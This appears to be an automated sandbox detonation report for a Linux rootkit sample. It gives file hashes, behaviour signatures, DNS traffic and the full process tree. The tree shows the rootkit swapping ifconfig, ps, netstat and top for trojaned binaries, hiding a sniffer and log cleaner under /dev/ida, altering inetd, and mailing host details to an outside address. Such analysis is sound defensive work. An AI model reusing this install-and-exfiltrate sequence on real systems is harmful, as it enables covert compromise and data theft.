| SHA512 | b2b905ca574fb69053f42c8af51056907f7da911decdb0172fe100bfe70d4acc5871e5529ebe969e12e128ce17f070d5bf7799842ef7847decad1f93b878738f |
/var/spool/exim4/msglog/1t2jGY-0000D1-JD
| MD5 | a7b7a74bd9904f0600e51be008ef3359 |
| SHA1 | 3c590c832f1e1c9b5369ccc362913ee8213bca89 |
| SHA256 | 7d561c821931ba02e5a4e2cb5ad132a12f356b580cebe2373e68d412d72f02d1 |
| SHA512 | 2ebcbaf25f272e61d2efe37b9c18408fc837c74323290b940b191d47e254b67d0a3765625e40d96e13ed68edc24cbe59cf09440f3d2641eb4a827218cfe419ee |
/var/spool/exim4/input/hdr.800
| MD5 | d1650e93e40c9473c2e6b9abf083b47f |
| SHA1 | 196146df65756d1006748f8cfb6464d1d2e0936d |
| SHA256 | 0d4095f2f90979832e011642da6443f1c661ce2afba6b1288a3bbbbb94f9646f |
| SHA512 | f05dab17e4dbda8203d11efaec298c33f86661a94e249785245a44616ef5a5b39e1f1e0789b533dd106a0c841304467ced22f0ef317edf29cfe0c75029486727 |
/var/mail/user
| MD5 | e358c7b5d7fd98df061e02420e774538 |
| SHA1 | 92f8224fb9577638892dc39e2441bf61292217b0 |
| SHA256 | 194640549c2e6fdd92ba3548dc0c9895551f1d8ffa715840bfcda8f3d6a372e3 |
| SHA512 | b48ffb556b286518d431baf30a2bde6a1bd55e5af330a83fe7e004944bdba3bbc1a21964cebadcfe6461bfe372f32ee2063ba477892c228f9f1375bd463663d7 |
/var/spool/exim4/msglog/1t2jGY-0000D1-JD
| MD5 | 330ea5468f8578f0206d57b26985aa11 |
| SHA1 | 3582aaeb9aaa9ef88eed41c07996b51461a3b980 |
| SHA256 | d69cf3564bf77f8fc0b1cef7f49f8815819bc8159413d8eeafc0d22a7def0664 |
| SHA512 | e4c7808d4b3006f9607bbb957a7ecf065d88298873938136b7e4892460e2e80cf6559316bc5bb5b232f7d859c187be3de2e1111200dd7ba9825b126672dabfb1 |
/computer
| MD5 | 2a4270da036540595d16930eded05157 |
| SHA1 | 6e3b0043fd2492294cd1e07608d44f9888bf2d8a |
| SHA256 | dcb110667a5619f2a662b617df27317ca98196ca9cd9e45a0c81a23512858f88 |
| SHA512 | 5a5aaf7085b4e3ce6ac4b7bc17bc4ce77fa26037a8b30396a6522d46511486d9f0ab1530f45fee1114ec6713b0fb5d9706f2d5c87d70f8661d4e313514bb559a |
/computer
| MD5 | 7f4cb9ccf09825d48496b71597db9750 |
| SHA1 | af1299512a0ad5ff537ec5e8af89977c6bdd9568 |
| SHA256 | 6442aa905c6baf27da4b5f8ecd23d7d22f92323eb3bc74d8d915c97fa16eff4c |
| SHA512 | 904281fc535e248df7e937ff7727f13a86a06a2787fa1c69933389bcfd6e0fd8bbd4fb7bd890c21bf816dc7d7d50d2b05c5abeec48c0cf98b632621ee87bb140 |
/computer
| MD5 | e1e18ba76cbd2f5fe075cec09d9357d6 |
| SHA1 | 278c24b29e7dd36a29ff45a4ebd6cdf23b6ec63e |
| SHA256 | 0ab8e7b12f358fec2cc1ddc2537ffd4ab2887b7f689ae48103605a73bd20440a |
| SHA512 | 429397adb71d29633ee2bcb1e1e54cb68a9895cbc170ec6a6300e9585b9fd152ff6fbb83a3aaed7ee144c1822f1721aec2822c5e3aa546e679cc4275da43242e |
/var/spool/exim4/input/1t2jGi-0000EP-Hf-D
| MD5 | 99768ab00927b702cd361427b18306f8 |
| SHA1 | cc4b02222a72e69ef96d5d134cb6825aabe9915e |
| SHA256 | 62652fdd0b664661e0df5a33d7fea8ee498695926b7b1f7c6fcf16c74a1e5f1d |
| SHA512 | 7bb6e18a44c28f41530ec5c1449c3c167e05225698a80984b2aab49d64b400d0d0b9bf61db0aba6ecb8f98f6161be4f4ae7424a7c580733d46436d5feb531b8a |
/var/spool/exim4/input/hdr.893
| MD5 | 9fa86bcb4991ee0015fb4e5138248e58 |
| SHA1 | 5574bf55de8e91683d98ca2bca10a62cb47a50ac |
| SHA256 | e36f896fa8e271ebcca9e0fe04c7046508ac90decc5b0716f340d1022f9825d8 |
| SHA512 | 68a79cc280e56a4aca222c0239f7bf732b4486ed5e089fbc22568ece753a9e94cd5fecd57af2aac4c83397c761bfc62a707bd60565dd5d0781a62450fc411c33 |
/var/spool/exim4/msglog/1t2jGi-0000EP-Hf
| MD5 | 128fd8e55ffff2b183e9e54dd7749132 |
| SHA1 | f7ce80325121447780002e7a2f404411bb3f272f |
| SHA256 | a954b433f919114995b2514cbdfa9cecf6563832736169ba4a7aef3dd2c8bb8b |
| SHA512 | 28aa1d8c4f44fd641e3f46e067d5e71bc8ee8796884620958d099700844c163f76c718a000db1e214e6c599a0d93852b6388032baa9ef8d1411669d017aafa3e |
/var/spool/exim4/msglog/1t2jGi-0000EP-Hf
| MD5 | f762b7d12159efe0a15dd85e9220874c |
| SHA1 | 62fab2a845c317cb955307a3e0291c1b8fdb5f42 |
| SHA256 | 8a3e2c4a0cf583123cb0e17862fc838f4b3a025c42a3dc332866eaa390ff472d |
| SHA512 | a5c528880f0a0a2eb469b977c320adaf0f8553386a9d1b3e04421daf17157c935569d9d15c02c2dcf73ec2d64b7509609633cb20f7e6026da42ca6e9efd0fdef |
/var/spool/exim4/input/1t2jGl-0000ET-NH-D
| MD5 | 3ce4fbaaf3765d8d1459398b17c413c4 |
| SHA1 | 4a9b67f2aa431a26792a8e99597976a5bbb426b8 |
| SHA256 | eb656a182f847a902b2b384c6456078f15c1fe54dc88cd2daf9d3435b577c388 |
| SHA512 | fcad23ac88eabd6529e32e2cba1c1eb93889af7d085cd439e257f6058dec0e526bf15bb0f743e670e2e78a89eab8580159c70282984f6b95e67846419d711c73 |
/var/spool/exim4/input/hdr.897
| MD5 | 5493516437aec402b0a9adf664235605 |
| SHA1 | bb8a0f36fb27c0f62a3668b88054ba8e06b06a7e |
| SHA256 | a5a3dca07507e2ce821bd532348018f0558ea31108f203bdc38f70a7a1194f44 |
| SHA512 | dce6998a4451398943cd0e84162c898bcd2d8f1834c7e53e98f7911e38e249331e76770e3fa18f2f2399197b149673919c0a5415baa6f2c45e710a4d2b2c0900 |
/var/spool/exim4/msglog/1t2jGl-0000ET-NH
| MD5 | d8f0f9c7ff7aeda2088efcba18e7db6e |
| SHA1 | 85fda667ea56b739f790eb6889f20853ff42a2ec |
| SHA256 | 1cfcc9997be4c747e78b6a62c14c2a662eff386492bdfbc872006ecfc45c52ba |
| SHA512 | 14c796cdf2458ab61109684a28a158b20695be02ec13a8bc862d6de8b0f9f89878be9658e50303c9ee19245e55f91d2a38e9cce9aaceb9a1f8dafe0e5a7a6738 |
/var/spool/exim4/input/hdr.894
| MD5 | f6c6269029f2d6f04892f9ee0b7b3933 |
| SHA1 | 0aa018c92dfc858aaf63eca5487540f09e7017e0 |
| SHA256 | 6070d84d6513ca5e16ca7daf23f9ce82ac492e3debbab28e89bf72445c4de5e5 |
| SHA512 | 490e45eb17f59ea2be4571ed016a4efe8c1382783a12f0a8706e5c685c3367c936c7d361c488160e67bebdc80dadc79bf43aa7cc617f49684b685bf540fbbab3 |
/var/spool/exim4/input/1t2jGm-0000EU-Jj-D
| MD5 | 74224335dff2abe0a998b1f06805bfba |
| SHA1 | 8c360cb35892029092f98c46c3ee223298386e56 |
| SHA256 | da619bbacb247f4942ae47f157c9853330df09567a08fbddc6558d13262cc7e3 |
| SHA512 | 629e194701d5dae54de0a58b27b190855a8358fdd7a5450559f7e0caa1e9c9a872fb217fa1914c9bc135dbf90068cf58632e7b63a0da852b2344c5a4863b7fba |
/var/spool/exim4/input/hdr.898
| MD5 | 1c91bc2b8fe5e4b2126a75477b5f11a2 |
| SHA1 | 95b847a016ef750dc84b2dbaa1c8e59b5d32f79d |
| SHA256 | 4abd61a1102ded34c1c144bef2ff3d86ef8230458723f18c1340984a8d9fd001 |
| SHA512 | ef4c33b5e932db52013084204c998c23a287f6b840ec49898bc7695cf9bb4db47fa082c52ddadb2eae23f1afca97b0948006c74f55bf107c231b08dff6de46d7 |
/var/spool/exim4/msglog/1t2jGm-0000EU-Jj
| MD5 | dfb48b402911b99b2076f781c15167e3 |
| SHA1 | 9bc90714a93c8825077d2082bf8e5666cbea78a4 |
| SHA256 | 26f76d38be381ec91978da1c2c65086e8779ac25d73c47e48b89e3d37043d414 |
| SHA512 | 9a0d6e057ae89ebca65aa09ea9800ed61d53962ed7c762d18b5d24021454f69c0d9f769c511325ff06f22b2d18c6d18cd16fe4db4a69db75000b2735c3628be1 |
/var/mail/user
| MD5 | 7aac3cb8530ef5c9713885e5bccf1edf |
| SHA1 | f5778d27d83c63243485ffa857e29e76eda9d9db |
| SHA256 | aee2160de7249117ea7b1df6229341b61dc73685a94dc36b535837c72fede8f1 |
| SHA512 | c09a2b747681b97867c6dd48360626c2faa6add728393c489a1af6b3f3ef014a8806a160d21a67a7d93822fa37c58b15850b0eccefe23f1948cc018718540075 |
/var/spool/exim4/msglog/1t2jGl-0000ET-NH
| MD5 | 882cfa1ba576b75757f379a649c96253 |
| SHA1 | 755c5be3fd808ce6adef9e46660a62a8714e58cf |
| SHA256 | f36785f4194fa85b2627cd521d73c48a99fe7d249b592635e42b1ca12da6ab6e |
| SHA512 | 246dfe97ae32943a40328cf96bbe1be19218429a8e3c2396c589b04fdf2a818186dcac1106ab8230ff7a0b6d3136fc6eb7412290e4d47828e9e584a2f9c6a005 |
/var/spool/exim4/msglog/1t2jGm-0000EU-Jj
| MD5 | a80aa0e0a1bd8fa3dd53d3854415681f |
| SHA1 | fb3e43709d0bbc0d3a4d231bf2007b33ffffe574 |
| SHA256 | f2d77f27173f6641e57624329b818f112cd631c75c6b6c2716c942cf8dff326f |
| SHA512 | 0b2044e661376fa5be51095234074a77bd2f2b3bb04eb1d61a69b398ef91e2b7485665072be9e4d93fb797f8d54f3a003e6ba6657ff7d73a67729911b1434297 |
/var/spool/exim4/input/1t2jGo-0000Ed-F4-D
| MD5 | 3a1108b0ce7b5984bc59d938a4585296 |
| SHA1 | 947d7947ae20ed3c43ab3dbd693b643e05407532 |
| SHA256 | 8cb2bd31ae6ef5dd60c93935355e72f2b8fefe0a3556780668e01f562f6cdc8f |
| SHA512 | 54b337a0350649aebf41378137ecd6e65f17d2c1b7b9a5a40443d0d55cc6ee6a10fb6b76485624fc8768c0ddbb4f0458675dfdc74502f9faef5ad1826d18a142 |
/var/spool/exim4/input/hdr.907
| MD5 | 6a335a6b63391a1b071e6d9eba0d8616 |
| SHA1 | a1792f14340afbe82b9c4b7e555642275253a67a |
| SHA256 | c0a70d6b8d4dd0770947e04434065e837e26fce0676ef01a358dd685e350478f |
| SHA512 | 8e85ec6f3e4639b2717b4cfeb99085b93b23bcde4de532f3295d7dcfeea837e53968e84aab9b6af95ec03d2e0290a427d3c128d4fd1ab69ec66316257a6077c9 |
/var/spool/exim4/msglog/1t2jGo-0000Ed-F4
| MD5 | a8a7118dc8c70e84db5bb36e5bed5652 |
| SHA1 | 2c5545cf4c63591677d6608832f00319dc63cca2 |
| SHA256 | 360150e5acc75ef1e1a393b818c18ae5028edf7cf5fcf3914a7d5d69fcdf840e |
| SHA512 | fe04ab8bac57cb73052b53d12d2ed9f14765359870f871c1f9c8b368fe3579ecae80ccbae5f890a0827a1b432effcee8e1488c73ab216ce0ad05e4d81ac4c591 |
/var/spool/exim4/input/hdr.900
| MD5 | 484c74ac02d39af1d57873d4bd54088a |
| SHA1 | 022005e2fb548d8b14414dbc90a8f093bb74521f |
| SHA256 | 8c827018ed222445ac66d8a30b3ec0d4714f33bf50a00440df8fbd9a00eb31ec |
| SHA512 | 4f6583a1872aa127815cb4303c38219a7768723a6d0a29301e34dc9488fb9abd01eaebceab9706b8ed36694820a40e9fe73351a4c0314a7143059d125c9d85a0 |
/var/mail/user
| MD5 | fec4fb676da868075ad1377020cd4db3 |
| SHA1 | 3db64670976039d8a778f678023698a91106045d |
| SHA256 | 33fd4863191978a815e7f530ff8ebdc14051ddbf36ae4078d9773b81e2312893 |
| SHA512 | 42eebf2d792debd96d9da242b9ae66c13218467904e85fdbd8a98db784c0a4b00a704d26f6cd27e1ccbac37465937824a1c0acc17fa7895ffa6f2365559405e5 |
/var/spool/exim4/msglog/1t2jGo-0000Ed-F4
| MD5 | 3ceb6e2dc163f26b927165690cb2425c |
| SHA1 | 5b1f313aa65f57d6f30e3f0ad9a3f6615488afe2 |
| SHA256 | 888c7f62582a27a69e25911086642d7ca26bf9654f3ee931ebb5adf91a2887c9 |
| SHA512 | 834cffbf2d7b0f42d32ba6a309f87af75d1c0456910bfe2031833dc01f42aef5e5b7ebf3d7092305eebe184e985603b71dad39c61ce3fae32d3c1bd33812c2ac |
Analysis: behavioral4
Detonation Overview
Submitted
2024-10-21 05:39
Reported
2024-10-21 05:41
Platform
debian9-mipsel-20240418-en
Max time kernel
32s
Max time network
33s
Command Line
Signatures
Enumerates running processes
Virtualization/Sandbox Evasion: Time Based Evasion
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/uptime | N/A |
| N/A | N/A | /usr/bin/uptime | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /bin/cat | N/A |
| File opened for reading | /proc/cpuinfo | /bin/cat | N/A |
| File opened for reading | /proc/cpuinfo | /bin/cat | N/A |
| File opened for reading | /proc/cpuinfo | /bin/cat | N/A |
| File opened for reading | /proc/cpuinfo | /bin/cat | N/A |
| File opened for reading | /proc/cpuinfo | /bin/cat | N/A |
| File opened for reading | /proc/cpuinfo | /bin/cat | N/A |
| File opened for reading | /proc/cpuinfo | /bin/cat | N/A |
Reads CPU attributes
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/system/cpu/online | /usr/sbin/exim4 | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/sbin/exim4 | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/sbin/exim4 | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/sbin/exim4 | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/uptime | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/sbin/exim4 | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/sbin/exim4 | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/sbin/exim4 | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/sbin/exim4 | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/uptime | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/68/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/348/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/12/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/13/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/72/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/77/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/701/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/166/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/uptime | N/A |
| File opened for reading | /proc/37/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/4/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/24/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/116/cmdline | /usr/bin/killall | N/A |
| File opened for reading | /proc/166/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/373/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/706/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/708/cmdline | /usr/bin/killall | N/A |
| File opened for reading | /proc/filesystems | /bin/cp | N/A |
| File opened for reading | /proc/sys/kernel/ngroups_max | /usr/sbin/sendmail | N/A |
| File opened for reading | /proc/filesystems | /bin/mv | N/A |
| File opened for reading | /proc/filesystems | /bin/mkdir | N/A |
| File opened for reading | /proc/705/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/filesystems | /bin/cp | N/A |
| File opened for reading | /proc/21/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/82/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/346/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/686/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/700/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/701/cmdline | /usr/bin/killall | N/A |
| File opened for reading | /proc/filesystems | /bin/cp | N/A |
| File opened for reading | /proc/708/cmdline | /usr/bin/killall | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/killall | N/A |
| File opened for reading | /proc/167/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/665/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/filesystems | /bin/mkdir | N/A |
| File opened for reading | /proc/9/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/115/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/7/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/76/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/850/cmdline | /usr/bin/killall | N/A |
| File opened for reading | /proc/sys/kernel/ngroups_max | /usr/sbin/exim4 | N/A |
| File opened for reading | /proc/12/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/78/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/381/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/2/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/16/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/22/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/659/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/filesystems | /bin/cp | N/A |
| File opened for reading | /proc/236/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/372/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/5/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/145/cmdline | /usr/bin/killall | N/A |
| File opened for reading | /proc/68/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/145/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/318/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/19/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/116/cmdline | /usr/bin/killall | N/A |
| File opened for reading | /proc/340/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/850/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/filesystems | /bin/cp | N/A |
| File opened for reading | /proc/filesystems | /bin/cp | N/A |
| File opened for reading | /proc/71/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/150/stat | /usr/bin/killall | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/sbin/sendmail | N/A |
| N/A | N/A | /bin/mv | N/A |
| N/A | N/A | /usr/sbin/sendmail | N/A |
| N/A | N/A | /bin/mv | N/A |
| N/A | N/A | /bin/grep | N/A |
| N/A | N/A | /usr/sbin/sendmail | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /sbin/ifconfig | N/A |
| N/A | N/A | /bin/grep | N/A |
| N/A | N/A | /usr/sbin/sendmail | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /sbin/ifconfig | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/muhNq3al | /usr/bin/mail | N/A |
| File opened for modification | /tmp/muJn9dyP | /usr/bin/mail | N/A |
| File opened for modification | /tmp/mugLMKRb | /usr/bin/mail | N/A |
| File opened for modification | /tmp/mu9zWdaz | /usr/bin/mail | N/A |
| File opened for modification | /tmp/muoF00gm | /usr/bin/mail | N/A |
| File opened for modification | /tmp/computer | /tmp/65ae1a65bae6f9b863a267a1b4c5c504_JaffaCakes118 | N/A |
| File opened for modification | /tmp/mujqUXVi | /usr/bin/mail | N/A |
| File opened for modification | /tmp/muijdqPT | /usr/bin/mail | N/A |
| File opened for modification | /tmp/mueQACFR | /usr/bin/mail | N/A |
Processes
/tmp/65ae1a65bae6f9b863a267a1b4c5c504_JaffaCakes118
[/tmp/65ae1a65bae6f9b863a267a1b4c5c504_JaffaCakes118]
/usr/bin/clear
[clear]
/bin/chown
[chown root.root 65ae1a65bae6f9b863a267a1b4c5c504_JaffaCakes118 systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-kYdqiw]
/bin/rm
[rm -rf /sbin/ifconfig]
/bin/mv
[mv ifconfig /sbin/ifconfig]
/bin/rm
[rm -rf /bin/netstat]
/bin/mv
[mv netstat /bin/netstat]
/bin/rm
[rm -rf /bin/ps]
/bin/mv
[mv ps /bin/ps]
/bin/rm
[rm -rf /usr/bin/top]
/bin/mv
[mv top /usr/bin/top]
/bin/cp
[cp -f mkxfs /usr/sbin/]
/usr/bin/touch
[touch /dev/rpm]
/usr/bin/touch
[touch /dev/last]
/bin/mkdir
[mkdir -p /dev/ida/.drag-on]
/bin/mkdir
[mkdir -p /dev/ida/.. ]
/bin/cp
[cp linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed /dev/ida/.drag-on/]
/bin/cp
[cp linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed /dev/ida/.. ]
/bin/rm
[rm -rf linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed]
/usr/bin/touch
[touch /dev/ida/.drag-on/tcp.log]
/usr/bin/touch
[touch /dev/ida/.. /tcp.log]
/bin/cp
[cp -f inetd.conf /etc]
/bin/cp
[cp -f services /etc]
/usr/bin/killall
[killall -HUP inetd]
/bin/rm
[rm -rf /usr/bin/lsattr]
/bin/cp
[cp -f lsattr /usr/bin/]
/bin/chmod
[chmod 500 /usr/bin/lsattr]
/usr/bin/chattr
[chattr +i /usr/bin/lsattr]
/usr/bin/lsattr
[/usr/bin/lsattr]
/bin/sleep
[sleep 1]
/bin/uname
[uname -a]
/bin/hostname
[hostname -f]
/sbin/ifconfig
[/sbin/ifconfig]
/bin/grep
[grep inet]
/usr/bin/uptime
[uptime]
/bin/grep
[grep vendor_id]
/bin/cat
[cat /proc/cpuinfo]
/bin/grep
[grep model]
/bin/cat
[cat /proc/cpuinfo]
/bin/grep
[grep MHz]
/bin/cat
[cat /proc/cpuinfo]
/bin/cat
[cat /proc/cpuinfo]
/bin/grep
[grep bogomips]
/bin/df
[df -h]
/bin/cat
[cat computer]
/usr/bin/mail
[mail -s placinte [email protected]]
/usr/sbin/sendmail
[/usr/sbin/sendmail -oi -f root@debian9-mipsel-20240418-en-8 -t]
/usr/sbin/exim4
[/usr/sbin/exim4 -Mc 1t2jGV-0000Cj-J7]
/usr/bin/mail
[mail -s roote [email protected]]
/bin/cat
[cat computer]
/usr/sbin/exim4
[/usr/sbin/exim4 -t -oem -oi -f <> -E1t2jGV-0000Cj-J7]
/usr/sbin/sendmail
[/usr/sbin/sendmail -oi -f root@debian9-mipsel-20240418-en-8 -t]
/usr/sbin/exim4
[/usr/sbin/exim4 -Mc 1t2jGY-0000Cu-6i]
/usr/sbin/exim4
[/usr/sbin/exim4 -Mc 1t2jGZ-0000Cw-2A]
/bin/rm
[rm -rf last lk.tgz computer lk.tar.gz]
/usr/bin/clear
[clear]
/bin/chown
[chown root.root bin boot dev etc home initrd.img initrd.img.old lib lost+found media mnt opt proc root run sbin srv sys tmp usr var vmlinux vmlinux.old]
/usr/sbin/exim4
[/usr/sbin/exim4 -t -oem -oi -f <> -E1t2jGZ-0000Cw-2A]
/bin/rm
[rm -rf /sbin/ifconfig]
/bin/mv
[mv ifconfig /sbin/ifconfig]
/bin/rm
[rm -rf /bin/netstat]
/bin/mv
[mv netstat /bin/netstat]
/bin/rm
[rm -rf /bin/ps]
/bin/mv
[mv ps /bin/ps]
/usr/sbin/exim4
[/usr/sbin/exim4 -Mc 1t2jGb-0000DD-Ma]
/bin/rm
[rm -rf /usr/bin/top]
/bin/mv
[mv top /usr/bin/top]
/bin/cp
[cp -f mkxfs /usr/sbin/]
/usr/bin/touch
[touch /dev/rpm]
/usr/bin/touch
[touch /dev/last]
/bin/mkdir
[mkdir -p /dev/ida/.drag-on]
/bin/mkdir
[mkdir -p /dev/ida/.. ]
/bin/cp
[cp linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed /dev/ida/.drag-on/]
/bin/cp
[cp linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed /dev/ida/.. ]
/bin/rm
[rm -rf linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed]
/usr/bin/touch
[touch /dev/ida/.drag-on/tcp.log]
/usr/bin/touch
[touch /dev/ida/.. /tcp.log]
/bin/cp
[cp -f inetd.conf /etc]
/bin/cp
[cp -f services /etc]
/usr/bin/killall
[killall -HUP inetd]
/bin/rm
[rm -rf /usr/bin/lsattr]
/bin/cp
[cp -f lsattr /usr/bin/]
/bin/chmod
[chmod 500 /usr/bin/lsattr]
/usr/bin/chattr
[chattr +i /usr/bin/lsattr]
/usr/bin/lsattr
[/usr/bin/lsattr]
/bin/sleep
[sleep 1]
/bin/uname
[uname -a]
/bin/hostname
[hostname -f]
/sbin/ifconfig
[/sbin/ifconfig]
/bin/grep
[grep inet]
/usr/bin/uptime
[uptime]
/bin/grep
[grep vendor_id]
/bin/cat
[cat /proc/cpuinfo]
/bin/grep
[grep model]
/bin/cat
[cat /proc/cpuinfo]
/bin/cat
[cat /proc/cpuinfo]
/bin/grep
[grep MHz]
/bin/grep
[grep bogomips]
/bin/cat
[cat /proc/cpuinfo]
/bin/df
[df -h]
/usr/bin/mail
[mail -s placinte [email protected]]
/bin/cat
[cat computer]
/usr/sbin/sendmail
[/usr/sbin/sendmail -oi -f root@debian9-mipsel-20240418-en-8 -t]
/usr/sbin/exim4
[/usr/sbin/exim4 -Mc 1t2jGl-0000EQ-61]
/usr/bin/mail
[mail -s roote [email protected]]
/bin/cat
[cat computer]
/usr/sbin/exim4
[/usr/sbin/exim4 -t -oem -oi -f <> -E1t2jGl-0000EQ-61]
/usr/sbin/sendmail
[/usr/sbin/sendmail -oi -f root@debian9-mipsel-20240418-en-8 -t]
/usr/sbin/exim4
[/usr/sbin/exim4 -Mc 1t2jGn-0000EW-Cv]
/usr/sbin/exim4
[/usr/sbin/exim4 -Mc 1t2jGn-0000EZ-P2]
/bin/rm
[rm -rf last lk.tgz computer lk.tar.gz]
/usr/sbin/exim4
[/usr/sbin/exim4 -t -oem -oi -f <> -E1t2jGn-0000EZ-P2]
/usr/sbin/exim4
[/usr/sbin/exim4 -Mc 1t2jGp-0000En-Qq]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | debian9-mipsel-20240418-en-8 | udp |
| US | 1.1.1.1:53 | debian9-mipsel-20240418-en-8 | udp |
| US | 1.1.1.1:53 | debian9-mipsel-20240418-en-8 | udp |
| US | 1.1.1.1:53 | debian9-mipsel-20240418-en-8 | udp |
| US | 1.1.1.1:53 | debian9-mipsel-20240418-en-8 | udp |
| US | 1.1.1.1:53 | debian9-mipsel-20240418-en-8 | udp |
| US | 1.1.1.1:53 | debian9-mipsel-20240418-en-8 | udp |
| US | 1.1.1.1:53 | debian9-mipsel-20240418-en-8 | udp |
| US | 1.1.1.1:53 | debian9-mipsel-20240418-en-8 | udp |
| US | 1.1.1.1:53 | debian9-mipsel-20240418-en-8 | udp |
| US | 1.1.1.1:53 | debian9-mipsel-20240418-en-8 | udp |
| US | 1.1.1.1:53 | debian9-mipsel-20240418-en-8 | udp |
| US | 1.1.1.1:53 | debian9-mipsel-20240418-en-8 | udp |
| US | 1.1.1.1:53 | debian9-mipsel-20240418-en-8 | udp |
| US | 1.1.1.1:53 | debian9-mipsel-20240418-en-8 | udp |
| US | 1.1.1.1:53 | debian9-mipsel-20240418-en-8 | udp |
| US | 1.1.1.1:53 | debian9-mipsel-20240418-en-8 | udp |
| US | 1.1.1.1:53 | debian9-mipsel-20240418-en-8 | udp |
| US | 1.1.1.1:53 | debian9-mipsel-20240418-en-8 | udp |
| US | 1.1.1.1:53 | debian9-mipsel-20240418-en-8 | udp |
| US | 1.1.1.1:53 | debian9-mipsel-20240418-en-8 | udp |
| US | 1.1.1.1:53 | debian9-mipsel-20240418-en-8 | udp |
| US | 1.1.1.1:53 | debian9-mipsel-20240418-en-8 | udp |
| US | 1.1.1.1:53 | debian9-mipsel-20240418-en-8 | udp |
| US | 1.1.1.1:53 | debian9-mipsel-20240418-en-8 | udp |
| US | 1.1.1.1:53 | debian9-mipsel-20240418-en-8 | udp |
| US | 1.1.1.1:53 | debian9-mipsel-20240418-en-8 | udp |
| US | 1.1.1.1:53 | debian9-mipsel-20240418-en-8 | udp |
| US | 1.1.1.1:53 | debian9-mipsel-20240418-en-8 | udp |
| US | 1.1.1.1:53 | debian9-mipsel-20240418-en-8 | udp |
| US | 1.1.1.1:53 | debian9-mipsel-20240418-en-8 | udp |
| US | 1.1.1.1:53 | debian9-mipsel-20240418-en-8 | udp |
| US | 1.1.1.1:53 | debian9-mipsel-20240418-en-8 | udp |
| US | 1.1.1.1:53 | debian9-mipsel-20240418-en-8 | udp |
| US | 1.1.1.1:53 | debian9-mipsel-20240418-en-8 | udp |
| US | 1.1.1.1:53 | debian9-mipsel-20240418-en-8 | udp |
| US | 1.1.1.1:53 | debian9-mipsel-20240418-en-8 | udp |
| US | 1.1.1.1:53 | debian9-mipsel-20240418-en-8 | udp |
Files
/dev/rpm
| MD5 | 4e6ac6c2a2fecfe1e88ed9ef72c2d2cd |
| SHA1 | 76015ef9244670de728b830ad330c536f42c4e39 |
| SHA256 | 625d8ffa241021399ea6cf2f8f6ceaa5b19bee660bed532ef6c7dbead906917c |
